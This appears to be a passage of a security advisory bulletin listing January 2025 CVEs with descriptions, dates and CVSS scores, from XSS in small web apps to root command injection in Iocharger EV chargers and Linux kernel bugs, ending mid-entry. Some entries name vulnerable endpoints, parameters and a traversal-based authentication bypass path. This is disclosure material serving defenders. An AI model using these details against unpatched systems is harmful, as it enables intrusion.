A vulnerability classified as problematic has been found in langhsu Mblog Blog System 3.5.0. Affected is an unknown function of the file /login. The manipulation leads to observable response discrepancy. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 3.7 | CVE-2024-13198 |
| langhsu--Mblog Blog System |
A vulnerability classified as problematic was found in langhsu Mblog Blog System 3.5.0. Affected by this vulnerability is an unknown functionality of the file /search of the component Search Bar. The manipulation of the argument kw leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 3.5 | CVE-2024-13199 |
| longpi1--warehouse |
A vulnerability has been found in longpi1 warehouse 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /resources/..;/inport/updateInport of the component Backend. The manipulation of the argument remark leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-12 | 2.4 | CVE-2025-0398 |
| Mattermost--Mattermost |
Mattermost versions 10.x <= 10.2 fail to accurately reflect missing settings, which allows confusion for admins regarding a Calls security-sensitive configuration via incorrect UI reporting. | 2025-01-09 | 3.5 | CVE-2025-22445 |
| Mattermost--Mattermost |
Mattermost versions 9.11.x <= 9.11.5 fail to enforce invite permissions, which allows team admins, with no permission to invite users to their team, to invite users by updating the "allow_open_invite" field via making their team public. | 2025-01-09 | 3.8 | CVE-2025-22449 |
| Mozilla--Firefox |
Under certain circumstances, a user opt-in setting that Focus should require authentication before use could have been be bypassed. This vulnerability affects Firefox < 134. | 2025-01-07 | 3.3 | CVE-2025-0245 |
| n/a--n/a |
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component. | 2025-01-06 | 2.7 | CVE-2024-48455 |
| OISF--suricata |
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.8, a large BPF filter file provided to Suricata at startup can lead to a buffer overflow at Suricata startup. The issue has been addressed in Suricata 7.0.8. | 2025-01-06 | 3.3 | CVE-2024-55626 |
| reckcn--SPPanAdmin |
A vulnerability, which was classified as problematic, was found in reckcn SPPanAdmin 1.0. Affected is an unknown function of the file /;/admin/role/edit. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-12 | 3.5 | CVE-2025-0397 |
| Redaxo--CMS |
A vulnerability was found in Redaxo CMS 5.18.1. It has been classified as problematic. Affected is an unknown function of the file /index.php?page=structure&category_id=1&article_id=1&clang=1&function=edit_art&artstart=0 of the component Structure Management Page. The manipulation of the argument Article Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 2.4 | CVE-2024-13209 |
| silabs.com--Ember ZNet SDK |
A buffer overflow vulnerability in the packet handoff plugin allows an attacker to overwrite memory outside the plugin's buffer. | 2025-01-09 | 3.7 | CVE-2024-10106 |
| SingMR--HouseRent |
A vulnerability classified as problematic was found in SingMR HouseRent 1.0. This vulnerability affects unknown code of the file /toAdminUpdateHousePage?hID=30. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 3.5 | CVE-2024-13213 |
| StarSea99--starsea-mall |
A vulnerability was found in StarSea99 starsea-mall 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/categories/update. The manipulation of the argument categoryName leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-12 | 2.4 | CVE-2025-0400 |
| strawberry-graphql--strawberry |
Strawberry GraphQL is a library for creating GraphQL APIs. Starting in 0.182.0 and prior to version 0.257.0, a type confusion vulnerability exists in Strawberry GraphQL's relay integration that affects multiple ORM integrations (Django, SQLAlchemy, Pydantic). The vulnerability occurs when multiple GraphQL types are mapped to the same underlying model while using the relay node interface. When querying for a specific type using the global node field (e.g., FruitType:some-id), the resolver may incorrectly return an instance of a different type mapped to the same model (e.g., SpecialFruitType). This can lead to information disclosure if the alternate type exposes sensitive fields and potential privilege escalation if the alternate type contains data intended for restricted access. This vulnerability is fixed in 0.257.0. | 2025-01-09 | 3.7 | CVE-2025-22151 |
| TUBITAK BILGEM--Pardus OS My Computer |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in TUBITAK BILGEM Pardus OS My Computer allows OS Command Injection.This issue affects Pardus OS My Computer: before 0.7.2. | 2025-01-06 | 3.9 | CVE-2024-12970 |
| Unknown--Form Maker by 10Web |
The Form Maker by 10Web WordPress plugin before 1.15.31 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-07 | 2.7 | CVE-2024-10562 |
| Unknown--Photo Gallery, Images, Slider in Rbs Image Gallery |
The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its Gallery settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks | 2025-01-07 | 2.7 | CVE-2024-10102 |
| Vanderbilt--REDCap |
An issue was discovered in REDCap 14.9.6. It has an action=myprojects&logout=1 CSRF issue in the alert-title while performing an upload of a CSV file containing a list of alert configuration. An attacker can send the victim a CSV file containing an HTML injection payload in the alert-title. Once the victim uploads the file, he automatically lands on a page to view the uploaded data. If the victim click on the alert-title value, it can trigger a logout request and terminates their session, or redirect to a phishing website. This vulnerability stems from the absence of CSRF protections on the logout functionality. | 2025-01-10 | 3.4 | CVE-2025-23113 |
| wander-chu--SpringBoot-Blog |
A vulnerability was found in wander-chu SpringBoot-Blog 1.0 and classified as problematic. This issue affects the function modifiyArticle of the file src/main/java/com/my/blog/website/controller/admin/PageController.java of the component Blog Article Handler. The manipulation of the argument content leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 2.4 | CVE-2024-13202 |
| ZeroWdd--myblog |
A vulnerability, which was classified as problematic, was found in ZeroWdd myblog 1.0. Affected is the function update of the file src/main/java/com/wdd/myblog/controller/admin/BlogController.java. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-08 | 3.5 | CVE-2024-13192 |
| ZeroWdd--studentmanager |
A vulnerability was found in ZeroWdd studentmanager 1.0. It has been rated as problematic. This issue affects the function submitAddPermission of the file src/main/java/com/zero/system/controller/PermissionController. java. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-06 | 2.4 | CVE-2024-13143 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| CarbonPHP--carbon |
Carbon is an international PHP extension for DateTime. Application passing unsanitized user input to Carbon::setLocale are at risk of arbitrary file include, if the application allows users to upload files with .php extension in an folder that allows include or require to read it, then they are at risk of arbitrary code ran on their servers. This vulnerability is fixed in 3.8.4 and 2.72.6. | 2025-01-08 | not yet calculated | CVE-2025-22145 |
| charmbracelet--soft-serve |
Soft Serve is a self-hostable Git server for the command line. Prior to 0.8.2 , a path traversal attack allows existing non-admin users to access and take over other user's repositories. A malicious user then can modify, delete, and arbitrarily repositories as if they were an admin user without explicitly giving them permissions. This is patched in v0.8.2. | 2025-01-08 | not yet calculated | CVE-2025-22130 |
| dataease--dataease |
DataEase is an open source data visualization analysis tool. Prior to 2.10.4, there is a flaw in the authentication in the io.dataease.auth.filter.TokenFilter class, which can be bypassed and cause the risk of unauthorized access. In the io.dataease.auth.filter.TokenFilter class, "request.getRequestURI" is used to obtain the request URL, and it is passed to the "WhitelistUtils.match" method to determine whether the URL request is an interface that does not require authentication. The "match" method filters semicolons, but this is not enough. When users set "server.servlet.context-path" when deploying products, there is still a risk of being bypassed, which can be bypassed by any whitelist prefix /geo/../context-path/. The vulnerability has been fixed in v2.10.4. | 2025-01-10 | not yet calculated | CVE-2024-56511 |
| Drupal--Advanced Varnish |
Insertion of Sensitive Information Into Sent Data vulnerability in Drupal Advanced Varnish allows Forceful Browsing.This issue affects Advanced Varnish: from 0.0.0 before 4.0.11. | 2025-01-09 | not yet calculated | CVE-2024-13269 |
| Drupal--Allow All File Extensions for file fields |
Vulnerability in Drupal Allow All File Extensions for file fields.This issue affects Allow All File Extensions for file fields: *.*. | 2025-01-09 | not yet calculated | CVE-2024-13311 |
| Drupal--Browser Back Button |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Browser Back Button allows Cross-Site Scripting (XSS).This issue affects Browser Back Button: from 1.0.0 before 2.0.2. | 2025-01-09 | not yet calculated | CVE-2024-13308 |
| Drupal--Content Entity Clone |
Incorrect Authorization vulnerability in Drupal Content Entity Clone allows Forceful Browsing.This issue affects Content Entity Clone: from 0.0.0 before 1.0.4. | 2025-01-09 | not yet calculated | CVE-2024-13271 |
| Drupal--Freelinking |
Incorrect Authorization vulnerability in Drupal Freelinking allows Forceful Browsing.This issue affects Freelinking: from 0.0.0 before 4.0.1. | 2025-01-09 | not yet calculated | CVE-2024-13270 |
| Drupal--Git Utilities for Drupal |
Vulnerability in Drupal Git Utilities for Drupal.This issue affects Git Utilities for Drupal: *.*. | 2025-01-09 | not yet calculated | CVE-2024-13310 |
| Drupal--Login Disable |
Improper Authentication vulnerability in Drupal Login Disable allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Login Disable: from 2.0.0 before 2.1.1. | 2025-01-09 | not yet calculated | CVE-2024-13309 |
| Drupal--Megamenu Framework |
Vulnerability in Drupal Megamenu Framework.This issue affects Megamenu Framework: *.*. | 2025-01-09 | not yet calculated | CVE-2024-13299 |
| Drupal--OhDear Integration |
Incorrect Authorization vulnerability in Drupal OhDear Integration allows Forceful Browsing.This issue affects OhDear Integration: from 0.0.0 before 2.0.4. | 2025-01-09 | not yet calculated | CVE-2024-13290 |
| Drupal--Open Social |
Improper Control of Interaction Frequency vulnerability in Drupal Open Social allows Functionality Misuse.This issue affects Open Social: from 0.0.0 before 12.3.8, from 12.4.0 before 12.4.5. | 2025-01-09 | not yet calculated | CVE-2024-13274 |
| Drupal--Open Social |
Missing Authorization vulnerability in Drupal Open Social allows Forceful Browsing.This issue affects Open Social: from 11.8.0 before 12.3.10, from 12.4.0 before 12.4.9. | 2025-01-09 | not yet calculated | CVE-2024-13312 |
| Drupal--Opigno |
Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno allows PHP Local File Inclusion.This issue affects Opigno: from 7.X-1.0 before 7.X-1.23. | 2025-01-09 | not yet calculated | CVE-2024-13268 |
| Drupal--Opigno Learning path |
Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno Learning path allows PHP Local File Inclusion.This issue affects Opigno Learning path: from 0.0.0 before 3.1.2. | 2025-01-09 | not yet calculated | CVE-2024-13265 |
| Drupal--Opigno TinCan Question Type |
Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno TinCan Question Type allows PHP Local File Inclusion.This issue affects Opigno TinCan Question Type: from 7.X-1.0 before 7.X-1.3. | 2025-01-09 | not yet calculated | CVE-2024-13267 |
| Drupal--Paragraphs table |
Insufficient Granularity of Access Control vulnerability in Drupal Paragraphs table allows Content Spoofing.This issue affects Paragraphs table: from 0.0.0 before 1.23.0, from 2.0.0 before 2.0.2. | 2025-01-09 | not yet calculated | CVE-2024-13272 |
| Drupal--Print Anything |
Vulnerability in Drupal Print Anything.This issue affects Print Anything: *.*. | 2025-01-09 | not yet calculated | CVE-2024-13300 |
| Drupal--Responsive and off-canvas menu |
Incorrect Authorization vulnerability in Drupal Responsive and off-canvas menu allows Forceful Browsing.This issue affects Responsive and off-canvas menu: from 0.0.0 before 4.4.4. | 2025-01-09 | not yet calculated | CVE-2024-13266 |
| Drupal--Security Kit |
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in Drupal Security Kit allows HTTP DoS.This issue affects Security Kit: from 0.0.0 before 2.0.3. | 2025-01-09 | not yet calculated | CVE-2024-13275 |
| Eugeny--tabby |
Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.217 , Tabby enables several high-risk Electron Fuses, including RunAsNode, EnableNodeCliInspectArguments, and EnableNodeOptionsEnvironmentVariable. These fuses create potential code injection vectors even though the application is signed with hardened runtime and lacks dangerous entitlements such as com.apple.security.cs.disable-library-validation and com.apple.security.cs.allow-dyld-environment-variables. This vulnerability is fixed in 1.0.217. | 2025-01-08 | not yet calculated | CVE-2025-22136 |
| guzzle--oauth-subscriber |
Guzzle OAuth Subscriber signs Guzzle requests using OAuth 1.0. Prior to 0.8.1, Nonce generation does not use sufficient entropy nor a cryptographically secure pseudorandom source. This can leave servers vulnerable to replay attacks when TLS is not used. This vulnerability is fixed in 0.8.1. | 2025-01-06 | not yet calculated | CVE-2025-21617 |
| Iocharger--Iocharger firmware for AC models |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Iocharger firmware for AC models allows OS Command Injection as root This issue affects firmware versions before 24120701. Likelihood: Moderate - The <redacted> binary does not seem to be used by the web interface, so it might be more difficult to find. It seems to be largely the same binary as used by the Iocharger Pedestal charging station, however. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a crafted HTTP request. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. CVSS clarification: The attack can be executed over any network connection serving the web interface (AV:N). There are no additional measures that need to be circumvented (AC:L) or attack preconditions (AT:N). THe attack is privileged, but the level does not matter (PR:L) and does not require user interaction (UI:N). Attack leads to full system compromised (VC:H/VI:H/VA:H) and compromised devices can be used to "pivot" to other networks that should be unreachable (SC:L/SI:L/SA:H). Because this an EV charger using high power, there is a potential safety impact (S:P). The attack can be automated (AU:Y). | 2025-01-09 | not yet calculated | CVE-2024-43650 |
| Iocharger--Iocharger firmware for AC models |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability allows OS Command Injection as root This issue affects Iocharger firmware for AC models before version 241207101 Likelihood: Moderate - The <redacted> binary does not seem to be used by the web interface, so it might be more difficult to find. It seems to be largely the same binary as used by the Iocharger Pedestal charging station, however. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a crafted HTTP request. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. CVSS clarification:Â Any network connection serving the web interface is vulnerable (AV:N) and there are no additional measures to circumvent (AC:L) nor does the attack require special conditions to be present (AT:N). The attack requires authentication, but the level does not matter (PR:L), nor is user interaction required (UI:N). The attack leads to a full compromised (VC:H/VI:H/VA:H) and a compromised device can be used to potentially "pivot" into a network that should nopt be reachable (SC:L/SI:L/SA:H). Because this is an EV charger handing significant power, there is a potential safety impact (S:P). THe attack can be autometed (AU:Y). | 2025-01-09 | not yet calculated | CVE-2024-43651 |
| Iocharger--Iocharger firmware for AC models |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability allows OS Command Injection as root This issue affects Iocharger firmware for AC model chargers before version 24120701. Likelihood: Moderate - The attacker will first need to find the name of the script, and needs a (low privilege) account to gain access to the script, or convince a user with such access to execute a request to it. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and deletefiles and services. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, but the level of authentication does not matter (PR:L), nor is any user interaction required (UI:N). The attack leads to a full compromised (VC:H/VI:H/VA:H), and compromised devices can be used to pivot into networks that should potentially not be accessible (SC:L/SI:L/SA:H). Becuase this is an EV charger handing significant power, there is a potential safety impact (S:P). This attack can be automated (AU:Y). | 2025-01-09 | not yet calculated | CVE-2024-43655 |
| Iocharger--Iocharger firmware for AC models |
Patch traversal, External Control of File Name or Path vulnerability in Iocharger Home allows deletion of arbitrary files This issue affects Iocharger firmware for AC model before firmware version 25010801. Likelihood: High, but requires authentication Impact: Critical - The vulnerability can be used to delete any file on the charging station, severely impacting the integrity of the charging station. Furthermore, the vulnerability could be used to delete binaries required for the functioning of the charging station, severely impacting the availability of the charging station. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, but the level of authentication does not matter (PR:L), nor is any user interaction required (UI:N). The attack leads compromised of the integrity and availability of the device (VVC:N/VI:H/VA:H), with no effect on subsequent systems (SC:N/SI:N/SA:N). We do not forsee a safety impact (S:N). This attack can be automated (AU:Y). | 2025-01-09 | not yet calculated | CVE-2024-43658 |
| Iocharger--Iocharger firmware for AC models |
The <redacted>.exe or <redacted>.exe CGI binary can be used to upload arbitrary files to /tmp/upload/ or /tmp/ respectively as any user, although the user interface for uploading files is only shown to the iocadmin user. This issue affects Iocharger firmware for AC models before version 24120701. Likelihood: Moderate - An attacker will need to have knowledge of this CGI binary, e.g. by finding it in firmware. Furthermore, the attacker will need a (low privilege) account to gain access to the <redacted>.exe or <redacted>.exe CGI binary and upload the file, or convince a user with such access to upload it. Impact: Low - The attacker can upload arbitrary files to /tmp/upload/ or /tmp/. However, the attacker is unable to access or use these files without other vulnerabilities. CVSS clarification. The attack can be executed over any network connection the station is listening to and serves the web interface (AV:N), and there are no additional security measure sin place that need to be circumvented (AC:L), the attack does not rely on preconditions (AT:N). The attack does require authentication, but the level of authentication is irrelevant (PR:L), it does not require user interaction (UI:N). Artitrary files can be uploaded, be these files will not be in a location where they can influence confidentiality or availability and have a minimal impact on device integrity (VC:N/VI:L/VA:N). There is no impact on subsequent systems. (SC:N/SI:N/SA:N). While this device is an EV charger handing significant amounts of power, we do not expect this vulnerability to have a safety impact. The attack can be automated (AU:Y). | 2025-01-09 | not yet calculated | CVE-2024-43662 |
| Jan Syski--MegaBIP |
Websites managed by MegaBIP in versions below 5.15 are vulnerable to Cross-Site Request Forgery (CSRF) as the form available under "/edytor/index.php?id=7,7,0" lacks protection mechanisms. A user could be tricked into visiting a malicious website, which would send POST request to this endpoint. If the victim is a logged in administrator, this could lead to creation of new accounts and granting of administrative permissions. | 2025-01-10 | not yet calculated | CVE-2024-6662 |
| Jan Syski--MegaBIP |
During MegaBIP installation process, a user is encouraged to change a default path to administrative portal, as keeping it secret is listed by the author as one of the protection mechanisms. Publicly available source code of "/registered.php" discloses that path, allowing an attacker to attempt further attacks.  This issue affects MegaBIP software versions below 5.15 | 2025-01-10 | not yet calculated | CVE-2024-6880 |
| LabRedesCefetRJ--WeGIA |
WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the listar_permissoes.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msg_e parameter. This vulnerability is fixed in 3.2.8. | 2025-01-08 | not yet calculated | CVE-2025-22143 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: block: avoid to reuse `hctx` not removed from cpuhp callback list If the 'hctx' isn't removed from cpuhp callback list, we can't reuse it, otherwise use-after-free may be triggered. | 2025-01-11 | not yet calculated | CVE-2024-41149 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sched: fix warning in sched_setaffinity Commit 8f9ea86fdf99b added some logic to sched_setaffinity that included a WARN when a per-task affinity assignment races with a cpuset update. Specifically, we can have a race where a cpuset update results in the task affinity no longer being a subset of the cpuset. That's fine; we have a fallback to instead use the cpuset mask. However, we have a WARN set up that will trigger if the cpuset mask has no overlap at all with the requested task affinity. This shouldn't be a warning condition; its trivial to create this condition. Reproduced the warning by the following setup: - $PID inside a cpuset cgroup - another thread repeatedly switching the cpuset cpus from 1-2 to just 1 - another thread repeatedly setting the $PID affinity (via taskset) to 2 | 2025-01-11 | not yet calculated | CVE-2024-41932 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to shrink read extent node in batches We use rwlock to protect core structure data of extent tree during its shrink, however, if there is a huge number of extent nodes in extent tree, during shrink of extent tree, it may hold rwlock for a very long time, which may trigger kernel hang issue. This patch fixes to shrink read extent node in batches, so that, critical region of the rwlock can be shrunk to avoid its extreme long time hold. | 2025-01-11 | not yet calculated | CVE-2024-41935 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: i3c: Use i3cdev->desc->info instead of calling i3c_device_get_info() to avoid deadlock A deadlock may happen since the i3c_master_register() acquires &i3cbus->lock twice. See the log below. Use i3cdev->desc->info instead of calling i3c_device_info() to avoid acquiring the lock twice. v2: - Modified the title and commit message ============================================ WARNING: possible recursive locking detected 6.11.0-mainline -------------------------------------------- init/1 is trying to acquire lock: f1ffff80a6a40dc0 (&i3cbus->lock){++++}-{3:3}, at: i3c_bus_normaluse_lock but task is already holding lock: f1ffff80a6a40dc0 (&i3cbus->lock){++++}-{3:3}, at: i3c_master_register other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&i3cbus->lock); lock(&i3cbus->lock); *** DEADLOCK *** May be due to missing lock nesting notation 2 locks held by init/1: #0: fcffff809b6798f8 (&dev->mutex){....}-{3:3}, at: __driver_attach #1: f1ffff80a6a40dc0 (&i3cbus->lock){++++}-{3:3}, at: i3c_master_register stack backtrace: CPU: 6 UID: 0 PID: 1 Comm: init Call trace: dump_backtrace+0xfc/0x17c show_stack+0x18/0x28 dump_stack_lvl+0x40/0xc0 dump_stack+0x18/0x24 print_deadlock_bug+0x388/0x390 __lock_acquire+0x18bc/0x32ec lock_acquire+0x134/0x2b0 down_read+0x50/0x19c i3c_bus_normaluse_lock+0x14/0x24 i3c_device_get_info+0x24/0x58 i3c_device_uevent+0x34/0xa4 dev_uevent+0x310/0x384 kobject_uevent_env+0x244/0x414 kobject_uevent+0x14/0x20 device_add+0x278/0x460 device_register+0x20/0x34 i3c_master_register_new_i3c_devs+0x78/0x154 i3c_master_register+0x6a0/0x6d4 mtk_i3c_master_probe+0x3b8/0x4d8 platform_probe+0xa0/0xe0 really_probe+0x114/0x454 __driver_probe_device+0xa0/0x15c driver_probe_device+0x3c/0x1ac __driver_attach+0xc4/0x1f0 bus_for_each_dev+0x104/0x160 driver_attach+0x24/0x34 bus_add_driver+0x14c/0x294 driver_register+0x68/0x104 __platform_driver_register+0x20/0x30 init_module+0x20/0xfe4 do_one_initcall+0x184/0x464 do_init_module+0x58/0x1ec load_module+0xefc/0x10c8 __arm64_sys_finit_module+0x238/0x33c invoke_syscall+0x58/0x10c el0_svc_common+0xa8/0xdc do_el0_svc+0x1c/0x28 el0_svc+0x50/0xac el0t_64_sync_handler+0x70/0xbc el0t_64_sync+0x1a8/0x1ac | 2025-01-11 | not yet calculated | CVE-2024-43098 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: i3c: mipi-i3c-hci: Mask ring interrupts before ring stop request Bus cleanup path in DMA mode may trigger a RING_OP_STAT interrupt when the ring is being stopped. Depending on timing between ring stop request completion, interrupt handler removal and code execution this may lead to a NULL pointer dereference in hci_dma_irq_handler() if it gets to run after the io_data pointer is set to NULL in hci_dma_cleanup(). Prevent this my masking the ring interrupts before ring stop request. | 2025-01-11 | not yet calculated | CVE-2024-45828 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: don't access invalid sched Since 2320c9e6a768 ("drm/sched: memset() 'job' in drm_sched_job_init()") accessing job->base.sched can produce unexpected results as the initialisation of (*job)->base.sched done in amdgpu_job_alloc is overwritten by the memset. This commit fixes an issue when a CS would fail validation and would be rejected after job->num_ibs is incremented. In this case, amdgpu_ib_free(ring->adev, ...) will be called, which would crash the machine because the ring value is bogus. To fix this, pass a NULL pointer to amdgpu_ib_free(): we can do this because the device is actually not used in this function. The next commit will remove the ring argument completely. (cherry picked from commit 2ae520cb12831d264ceb97c61f72c59d33c0dbd7) | 2025-01-11 | not yet calculated | CVE-2024-46896 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: pinmux: Use sequential access to access desc->pinmux data When two client of the same gpio call pinctrl_select_state() for the same functionality, we are seeing NULL pointer issue while accessing desc->mux_owner. Let's say two processes A, B executing in pin_request() for the same pin and process A updates the desc->mux_usecount but not yet updated the desc->mux_owner while process B see the desc->mux_usecount which got updated by A path and further executes strcmp and while accessing desc->mux_owner it crashes with NULL pointer. Serialize the access to mux related setting with a mutex lock. cpu0 (process A) cpu1(process B) pinctrl_select_state() { pinctrl_select_state() { pin_request() { pin_request() { ... .... } else { desc->mux_usecount++; desc->mux_usecount && strcmp(desc->mux_owner, owner)) { if (desc->mux_usecount > 1) return 0; desc->mux_owner = owner; } } | 2025-01-11 | not yet calculated | CVE-2024-47141 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: dma-debug: fix a possible deadlock on radix_lock radix_lock() shouldn't be held while holding dma_hash_entry[idx].lock otherwise, there's a possible deadlock scenario when dma debug API is called holding rq_lock(): CPU0 CPU1 CPU2 dma_free_attrs() check_unmap() add_dma_entry() __schedule() //out (A) rq_lock() get_hash_bucket() (A) dma_entry_hash check_sync() (A) radix_lock() (W) dma_entry_hash dma_entry_free() (W) radix_lock() // CPU2's one (W) rq_lock() CPU1 situation can happen when it extending radix tree and it tries to wake up kswapd via wake_all_kswapd(). CPU2 situation can happen while perf_event_task_sched_out() (i.e. dma sync operation is called while deleting perf_event using etm and etr tmc which are Arm Coresight hwtracing driver backends). To remove this possible situation, call dma_entry_free() after put_hash_bucket() in check_unmap(). | 2025-01-11 | not yet calculated | CVE-2024-47143 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/smc: check smcd_v2_ext_offset when receiving proposal msg When receiving proposal msg in server, the field smcd_v2_ext_offset in proposal msg is from the remote client and can not be fully trusted. Once the value of smcd_v2_ext_offset exceed the max value, there has the chance to access wrong address, and crash may happen. This patch checks the value of smcd_v2_ext_offset before using it. | 2025-01-11 | not yet calculated | CVE-2024-47408 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: bpf: Prevent tailcall infinite loop caused by freplace There is a potential infinite loop issue that can occur when using a combination of tail calls and freplace. In an upcoming selftest, the attach target for entry_freplace of tailcall_freplace.c is subprog_tc of tc_bpf2bpf.c, while the tail call in entry_freplace leads to entry_tc. This results in an infinite loop: entry_tc -> subprog_tc -> entry_freplace --tailcall-> entry_tc. The problem arises because the tail_call_cnt in entry_freplace resets to zero each time entry_freplace is executed, causing the tail call mechanism to never terminate, eventually leading to a kernel panic. To fix this issue, the solution is twofold: 1. Prevent updating a program extended by an freplace program to a prog_array map. 2. Prevent extending a program that is already part of a prog_array map with an freplace program. This ensures that: * If a program or its subprogram has been extended by an freplace program, it can no longer be updated to a prog_array map. * If a program has been added to a prog_array map, neither it nor its subprograms can be extended by an freplace program. Moreover, an extension program should not be tailcalled. As such, return -EINVAL if the program has a type of BPF_PROG_TYPE_EXT when adding it to a prog_array map. Additionally, fix a minor code style issue by replacing eight spaces with a tab for proper formatting. | 2025-01-11 | not yet calculated | CVE-2024-47794 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: dlm: fix possible lkb_resource null dereference This patch fixes a possible null pointer dereference when this function is called from request_lock() as lkb->lkb_resource is not assigned yet, only after validate_lock_args() by calling attach_lkb(). Another issue is that a resource name could be a non printable bytearray and we cannot assume to be ASCII coded. The log functionality is probably never being hit when DLM is used in normal way and no debug logging is enabled. The null pointer dereference can only occur on a new created lkb that does not have the resource assigned yet, it probably never hits the null pointer dereference but we should be sure that other changes might not change this behaviour and we actually can hit the mentioned null pointer dereference. In this patch we just drop the printout of the resource name, the lkb id is enough to make a possible connection to a resource name if this exists. | 2025-01-11 | not yet calculated | CVE-2024-47809 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: check return value of ieee80211_probereq_get() for RNR The return value of ieee80211_probereq_get() might be NULL, so check it before using to avoid NULL pointer access. Addresses-Coverity-ID: 1529805 ("Dereference null return value") | 2025-01-11 | not yet calculated | CVE-2024-48873 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: btrfs: don't take dev_replace rwsem on task already holding it Running fstests btrfs/011 with MKFS_OPTIONS="-O rst" to force the usage of the RAID stripe-tree, we get the following splat from lockdep: BTRFS info (device sdd): dev_replace from /dev/sdd (devid 1) to /dev/sdb started ============================================ WARNING: possible recursive locking detected 6.11.0-rc3-btrfs-for-next #599 Not tainted -------------------------------------------- btrfs/2326 is trying to acquire lock: ffff88810f215c98 (&fs_info->dev_replace.rwsem){++++}-{3:3}, at: btrfs_map_block+0x39f/0x2250 but task is already holding lock: ffff88810f215c98 (&fs_info->dev_replace.rwsem){++++}-{3:3}, at: btrfs_map_block+0x39f/0x2250 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&fs_info->dev_replace.rwsem); lock(&fs_info->dev_replace.rwsem); *** DEADLOCK *** May be due to missing lock nesting notation 1 lock held by btrfs/2326: #0: ffff88810f215c98 (&fs_info->dev_replace.rwsem){++++}-{3:3}, at: btrfs_map_block+0x39f/0x2250 stack backtrace: CPU: 1 UID: 0 PID: 2326 Comm: btrfs Not tainted 6.11.0-rc3-btrfs-for-next #599 Hardware name: Bochs Bochs, BIOS 